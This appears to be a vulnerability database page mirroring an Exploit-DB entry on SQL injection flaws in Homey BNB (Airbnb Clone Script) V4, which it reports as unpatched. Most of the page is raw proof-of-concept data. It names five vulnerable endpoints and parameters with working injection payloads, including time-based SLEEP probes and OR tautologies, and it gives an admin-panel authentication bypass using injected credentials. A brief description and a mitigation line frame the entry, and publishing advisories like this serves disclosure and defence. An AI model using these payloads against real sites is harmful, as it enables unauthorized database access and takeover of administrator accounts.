Homey BNB (Airbnb Clone Script) - Multiple SQL Injection

vendor:

Homey BNB (Airbnb Clone Script)

by:

Ahmet Ümit BAYRAM

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Homey BNB (Airbnb Clone Script)

Affected Version From: V4

Affected Version To: V4

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2019

Homey BNB (Airbnb Clone Script) – Multiple SQL Injection

The Homey BNB (Airbnb Clone Script) version V4 is vulnerable to multiple SQL Injection attacks. The vulnerabilities exist in various parameters of different requests. An attacker can exploit these vulnerabilities to execute arbitrary SQL queries and potentially gain unauthorized access to the database.

Mitigation:

The vendor should validate and sanitize user inputs before using them in SQL queries to prevent SQL Injection attacks. Users are advised to update to a patched version when available.

Source

Exploit-DB raw data:

# Exploit Title: Homey BNB (Airbnb Clone Script) - Multiple SQL Injection
# Date: 27.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.doditsolutions.com/airbnb-clone-script/
# Demo Site: http://sitedemos.in/homeybnb/
# Version: V4
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/rooms/ajax_refresh_subtotal
Vulnerable Parameter: hosting_id (GET)
Payload: checkin=mm/dd/yy&checkout=mm/dd/yy&hosting_id=1' AND SLEEP(5)--
DXVl&number_of_guests=1


----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/admin/edit.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=if(now()=sysdate()%2Csleep(0)%2C0)


----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/admin/cms_getpagetitle.php?catid=1
Vulnerable Parameter: catid (GET)
Payload: catid=-1'%20OR%203*2*1=6%20AND%20000640=000640%20--%20


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/admin/getcmsdata.php?pt=1
Vulnerable Parameter: pt (GET)
Payload: pt=-1'%20OR%203*2*1=6%20AND%20000929=000929%20--%20

----- PoC 5: SQLi -----

Request: http://localhost/[PATH]/admin/getrecord.php?val=1
Vulnerable Parameter: val (GET)
Payload: val=-1'%20OR%203*2*1=6%20AND%20000886=000886%20--%20

----- PoC 6: SQLi (Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/admin/
Username: '=' 'or'
Password: '=' 'or'